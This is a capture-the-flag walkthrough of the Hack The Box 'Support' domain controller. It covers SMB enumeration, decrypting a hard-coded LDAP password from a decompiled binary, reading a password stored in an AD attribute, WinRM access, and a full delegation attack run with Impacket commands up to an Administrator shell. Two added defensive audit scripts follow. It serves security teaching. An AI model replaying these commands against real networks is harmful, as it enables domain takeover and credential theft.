Proof of Concept
10.129.12.17
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Support]
└─$ nxc smb 10.129.12.17 --generate-hosts-file hosts
SMB 10.129.12.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Support]
└─$ cat hosts
10.129.12.17 DC.support.htb support.htb DC
/etc/hosts file configuration
┌──(kali㉿kali)-[~/Support]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.12.17 DC.support.htb support.htb DC
Initial Access
The support-tools SMB share is accessible with the guest account
┌──(kali㉿kali)-[~/Support]
└─$ nxc smb support.htb -u 'guest' -p '' --shares
SMB 10.129.12.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.129.12.17 445 DC [+] support.htb\guest:
SMB 10.129.12.17 445 DC [*] Enumerated shares
SMB 10.129.12.17 445 DC Share Permissions Remark
SMB 10.129.12.17 445 DC ----- ----------- ------
SMB 10.129.12.17 445 DC ADMIN$ Remote Admin
SMB 10.129.12.17 445 DC C$ Default share
SMB 10.129.12.17 445 DC IPC$ READ Remote IPC
SMB 10.129.12.17 445 DC NETLOGON Logon server share
SMB 10.129.12.17 445 DC support-tools READ support staff tools
SMB 10.129.12.17 445 DC SYSVOL Logon server share
Enumerating the support-tools SMB share reveals the file UserInfo.exe.zip
┌──(kali㉿kali)-[~/Support]
└─$ smbclient //support.htb/support-tools/ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 959422 blocks available
Downloading UserInfo.exe.zip
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (112.2 KiloBytes/sec) (average 112.2 KiloBytes/sec)
smb: \>
After extracting UserInfo.exe.zip, analysing UserInfo.exe in dnSpy shows that LdapQuery looks up users by binding to LDAP as the ldap account
using System;
using System.DirectoryServices;
namespace UserInfo.Services
{
// Token: 0x02000007 RID: 7
internal class LdapQuery
{
// Token: 0x06000012 RID: 18 RVA: 0x00002190 File Offset: 0x00000390
public LdapQuery()
{
string password = Protected.getPassword();
this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
this.entry.AuthenticationType = AuthenticationTypes.Secure;
this.ds = new DirectorySearcher(this.entry);
}
<SNIP>
The getPassword function also reveals an encrypted password
using System;
using System.Text;
namespace UserInfo.Services
{
// Token: 0x02000006 RID: 6
internal class Protected
{
// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}
// Token: 0x04000005 RID: 5
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
// Token: 0x04000006 RID: 6
private static byte[] key = Encoding.ASCII.GetBytes("armando");
}
}
Decrypting enc_password yields the plaintext password
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
┌──(kali㉿kali)-[~/Support]
└─$ cat decrypt.py
import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
data = base64.b64decode(enc_password)
result = bytes([data[i] ^ key[i % len(key)] ^ 223 for i in range(len(data))])
print(result.decode())
┌──(kali㉿kali)-[~/Support]
└─$ python decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP authentication succeeded with the recovered account credentials
- ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
┌──(kali㉿kali)-[~/Support]
└─$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP 10.129.12.17 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP 10.129.12.17 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
BloodHound data collection
┌──(kali㉿kali)-[~/Support]
└─$ bloodhound-python -d 'support.htb' -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -c All -ns 10.129.12.17 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.support.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 07S
INFO: Compressing output into 20260218015956_bloodhound.zip
Collecting LDAP data with ldapsearch reveals the account password in the support user's attributes
- Ironside47pleasure40Watchful
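The password sits in the support user's free-text info attribute, which any authenticated domain user can read (the ldapsearch dump below shows it). As an added example that is not part of the original writeup, a small audit script that parses an LDIF export and flags credential-looking values in such attributes; SAMPLE_LDIF is a constructed sample shaped like the output below, and the password heuristic is an assumption of this example:

```python
import re

# Constructed sample LDIF shaped like the ldapsearch output in this writeup (not a real export).
SAMPLE_LDIF = """\
dn: CN=ldap,CN=Users,DC=support,DC=htb
sAMAccountName: ldap
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUAQAAA==
description: LDAP service account

dn: CN=support,CN=Users,DC=support,DC=htb
sAMAccountName: support
info: Ironside47pleasure40Watchful
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
"""

FREE_TEXT_ATTRS = ("info", "description", "comment", "title")  # readable by any authenticated user

def parse_ldif(text):
    """Split LDIF into entries (attr -> values); joins ' ' continuation lines, skips '#' comments and base64 ('::') values."""
    entries, cur, last = [], {}, None
    for line in text.splitlines():
        if not line.strip():                      # blank line ends the entry
            if cur:
                entries.append(cur)
            cur, last = {}, None
        elif line.startswith(" ") and last:       # wrapped value continues (leading space dropped)
            cur[last][-1] += line[1:]
        elif not line.startswith("#"):
            name, sep, value = line.partition(": ")
            last = None if (not sep or name.endswith(":")) else name
            if last:
                cur.setdefault(name, []).append(value)
    return entries + ([cur] if cur else [])

def looks_like_password(value):
    """Heuristic (assumed): one token of 8+ chars drawn from at least three character classes."""
    if len(value) < 8 or re.search(r"\s", value):
        return False
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    return sum(bool(re.search(c, value)) for c in classes) >= 3

def find_exposed_credentials(text):
    """Return (sAMAccountName, attribute, value) for every free-text value that looks like a password."""
    hits = []
    for entry in parse_ldif(text):
        who = entry.get("sAMAccountName", ["?"])[0]
        for attr in FREE_TEXT_ATTRS:
            hits += [(who, attr, v) for v in entry.get(attr, []) if looks_like_password(v)]
    return hits
```

Run against a real export (for example the ldapsearch.txt produced below) to find the same class of finding before an attacker does.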
┌──(kali㉿kali)-[~/Support]
└─$ ldapsearch -x -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldapsearch.txt
┌──(kali㉿kali)-[~/Support]
└─$ cat ldapsearch.txt | grep 'cn: support' -A 20 -B 20
lastLogoff: 0
lastLogon: 134158715967501299
pwdLastSet: 132982099064620523
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUAQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: ldap
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111146.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134158714570314241
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
WinRM login succeeded with the recovered account credentials
┌──(kali㉿kali)-[~/Support]
└─$ evil-winrm -i support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
8d336ab7a3921334d41aa8c27e59a56e
*Evil-WinRM* PS C:\Users\support\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.12.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1
Privilege Escalation
Checked BloodHound
- The members of the group SHARED SUPPORT ACCOUNTS@SUPPORT.HTB have GenericAll permissions to the computer DC.SUPPORT.HTB.
- This is also known as full control. This permission allows the trustee to manipulate the target object however they wish.
Added a new attacker-controlled computer account with Impacket’s addcomputer.py
┌──(kali㉿kali)-[~/Support]
└─$ impacket-addcomputer -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host DC.support.htb -domain-netbios SUPPORT 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.
Configured the target object so that the attacker-controlled computer can delegate to it
┌──(kali㉿kali)-[~/Support]
└─$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-1677581083-3380853377-188903654-6101)
Requested Service Ticket
┌──(kali㉿kali)-[~/Support]
└─$ impacket-getST -spn 'cifs/dc.support.htb' -impersonate 'Administrator' 'support.htb/attackersystem$:Summer2018!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
Used the issued ticket to connect as Administrator
┌──(kali㉿kali)-[~/Support]
└─$ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
┌──(kali㉿kali)-[~/Support]
└─$ impacket-psexec -k -no-pass administrator@dc.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file sIqFNCxy.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service YkOl on dc.support.htb.....
[*] Starting service YkOl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Read root.txt
C:\Users\Administrator\Desktop> type root.txt
7afe0d3de3f464a0475aa6dd7c6496d3
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.12.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1
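The escalation above turned on one LDAP write: msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ went from empty to a security descriptor naming ATTACKERSYSTEM$. That attribute is a binary self-relative security descriptor, so auditing it means decoding the DACL. As an added example that is not part of the original writeup, a parser that lists the SIDs granted in the attribute and diffs an old and new value so an unexpected change can be alerted on; build_rbcd_descriptor only constructs sample input for the parser, and the SID used in the test is the ATTACKERSYSTEM$ SID printed by impacket-rbcd above:

```python
import struct

def _sid_to_str(buf, off):
    """Decode a binary SID at buf[off:]; return (string form, byte length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def _str_to_sid(text):
    """Encode 'S-1-5-21-...' into the binary SID layout used inside ACEs."""
    rev, authority, *subs = (int(p) for p in text.split("-")[1:])
    return (struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def allowed_to_act_sids(sd):
    """List the trustee SIDs of ACCESS_ALLOWED ACEs in the DACL of a self-relative
    security descriptor, i.e. the accounts permitted to delegate to this computer."""
    rev, _, _, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == 0:                              # ACCESS_ALLOWED_ACE_TYPE
            sids.append(_sid_to_str(sd, pos + 8)[0])   # access mask occupies pos+4..pos+8
        pos += ace_size
    return sids

def build_rbcd_descriptor(sid_strings):
    """Construct a minimal self-relative descriptor granting full control to the given SIDs
    (constructed sample data for the parser; not byte-for-byte what Windows writes)."""
    aces = b""
    for s in sid_strings:
        sid = _str_to_sid(s)
        aces += struct.pack("<BBHI", 0, 0, 8 + len(sid), 0x000F01FF) + sid
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sid_strings), 0) + aces
    # control 0x8004 = SE_SELF_RELATIVE | SE_DACL_PRESENT; the DACL follows the 20-byte header
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

def delegation_changed(before, after):
    """Diff two attribute values; returns (added, removed) SIDs, the signal to alert on."""
    b = set(allowed_to_act_sids(before)) if before else set()
    a = set(allowed_to_act_sids(after))
    return sorted(a - b), sorted(b - a)
```

Feed the raw attribute value from an LDAP read of DC$ (or the two values from a replication or directory-change log) to allowed_to_act_sids and delegation_changed; any SID that is not an expected front-end service account is a finding.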